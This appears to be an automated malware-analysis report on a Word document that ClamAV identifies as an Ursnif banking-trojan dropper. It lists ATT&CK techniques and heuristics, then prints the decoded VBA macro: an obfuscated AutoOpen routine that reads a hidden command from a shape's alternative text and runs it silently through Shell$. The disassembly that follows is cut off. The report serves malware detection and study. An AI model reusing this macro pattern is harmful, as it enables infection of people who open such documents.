Verdict: MALICIOUS
Risk Score: 202
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro utilizes the Shell() function, indicating an attempt to execute external code. ClamAV detection confirms this as Ursnif, a known banking trojan. The macro likely downloads and executes a second-stage payload, consistent with Ursnif's typical behavior.
Heuristics (6)
- ClamAV: Doc.Dropper.Ursnif-6864686-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Ursnif-6864686-0
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: 6520457ad58e03c9137d89448fc745bf176dafa74c4cf0cdd07842395186f1d1) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11907 bytes |
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "lnumiha"
Sub AutoOpen()
Zxrzx = -66700
xjyz = "WkSz"
rdetojuq = 16663.3
pwuwarul = -93930 - Zxrzx
ddemupoly = "WkSz"
ThLKBgfW = 78670.6 - rdetojuq
lNLvK = -4382
Mrfvs = "KpPlK"
BWZyFs = 58483.5
lxazolo = -24721 - lNLvK
vrucyqavac = "KpPlK"
cTNKtlC = 10454.1 - BWZyFs
GqdzvCL = -84670
snatyt = "nqQeyaezSLpQb"
ayegf = 37921.3
xzamycu = -55902 - GqdzvCL
scHBtKA = "nqQeyaezSLpQb"
aaOfqZ = 15321.8 - ayegf
clfNOZ = -57476
kdivumohu = "eGCagkpIWuVQIL"
dqib = 13935.7
GlCsULcb = -61445 - clfNOZ
wWhdtSA = "eGCagkpIWuVQIL"
rmubakitowe = 73767.5 - dqib
vruhijiki = -24504
oNzjXuh = "UissTBEQDermql"
qjnGq = 88403.9
GEjGW = -8108 - vruhijiki
nJodXQI = "UissTBEQDermql"
hnulo = 73790.6 - qjnGq
hivWV = ActiveDocument.Shapes("qbezucagi").AlternativeText
tdiw = -27264
Cofmcp = "EZNopVQSywnQYVg"
BkrvvcT = 51421.9
FpTKsk = -23826 - tdiw
zselowywax = "EZNopVQSywnQYVg"
DKMRwJx = 99421.5 - BkrvvcT
vlzTGuX = -57637
ZguHgOmc = "mdxhtCfLg"
AOluo = 16786.4
mdivita = -37484 - vlzTGuX
wruroguboxa = "mdxhtCfLg"
acYRx = 92303.7 - AOluo
QIbpusij = -96003
BBypGmIP = "myCU"
rfypyheto = 99448.3
sKuXzI = -21640 - QIbpusij
tdgSa = "myCU"
wceranymuga = 87818.9 - rfypyheto
cnylymilani = -59133
vtWZSgUm = "OPOs"
WbMEXpb = 85808.7
WshWjzZT = -59276 - cnylymilani
dvyruqe = "OPOs"
IycGt = 27663.1 - WbMEXpb
lJtRaxKj = -56611
btyzif = "xGQfoDSSbbcjEpRV"
YuctqCN = 40958.5
jzomi = -48495 - lJtRaxKj
cwiryg = "xGQfoDSSbbcjEpRV"
jhih = 25793.2 - YuctqCN
Shell$ hivWV, vbHide
qzegoroci = -96350
VfWaJqh = "uuRRdgtepofzeX"
mguq = 18306.4
bnuVCt = -45227 - qzegoroci
UewxJ = "uuRRdgtepofzeX"
YlMJqED = 10582.3 - mguq
PGuTbF = -62416
VSKelD = "BPkDTBnje"
vdXPLgL = 87154.9
aqyfPvvD = -9281 - PGuTbF
lpah = "BPkDTBnje"
bAWAK = 73512.3 - vdXPLgL
udoFOCo = -9105
mrupebeq = "RBFyZngAqNetApEUC"
lyRPD = 81595.8
isnHub = -26829 - udoFOCo
sfunudilyb = "RBFyZngAqNetApEUC"
xNVtxMgz = 57462.8 - lyRPD
QAVgHM = -14065
pkafykavoz = "yhhZKuull"
kpykibar = 82656.7
pbyx = -30833 - QAVgHM
icjkt = "yhhZKuull"
PNeIIkIp = 19615.2 - kpykibar
RjNEjFui = -83294
xnydaqu = "IUsPmbOzAHVqjWWZZ"
aNdfIe = 33186.4
EiIfLWYR = -69942 - RjNEjFui
xkihip = "IUsPmbOzAHVqjWWZZ"
claXtRGm = 11973.7 - aNdfIe
wzoDmj = -67211
rdow = "TubiuGh"
cnasetevagy = 39349.1
fmelupyda = -25571 - wzoDmj
djajabirif = "TubiuGh"
dnidope = 47566.5 - cnasetevagy
svykesomage = -79173
KJneI = "RCupYUyumgpmUuScT"
ZZvYGggJ = 74108.1
kqefog = -72522 - svykesomage
TZMuxq = "RCupYUyumgpmUuScT"
qxil = 49972.7 - ZZvYGggJ
End Sub
' Processing file: /opt/analyzer/scan_staging/66dde291d39849dfbb19a613f88e79ce.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1097 bytes
' Macros/VBA/lnumiha - 7467 bytes
' Line #0:
' FuncDefn (Sub pwuwarul())
' Line #1:
' Line #2:
' Line #3:
' LitDI4 0x048C 0x0001
' UMi
' St ddemupoly
' Line #4:
' Line #5:
' LitStr 0x0004 "WkSz"
' St ThLKBgfW
' Line #6:
' Line #7:
' LitR8 0x3333 0x3333 0x45D3 0x40D0
' St lNLvK
' Line #8:
' Line #9:
' LitDI4 0x6EEA 0x0001
' UMi
' Ld ddemupoly
' Sub
' St Mrfvs
' Line #10:
' Line #11:
' LitStr 0x0004 "WkSz"
' St BWZyFs
' Line #12:
' Line #13:
' LitR8 0x999A 0x9999 0x34E9 0x40F3
' Ld lNLvK
' Sub
' St lxazolo
' Line #14:
' Line #15:
' LitDI2 0x111E
' UMi
' St vrucyqavac
' Line #16:
' Line #17:
' LitStr 0x0005 "KpPlK"
' St cTNKtlC
' Line #18:
' Line #19:
' LitR8 0x0000 0x0000 0x8E70 0x40EC
' St GqdzvCL
' Line #20:
' Line #21:
' LitDI2 0x6091
' U
... (truncated)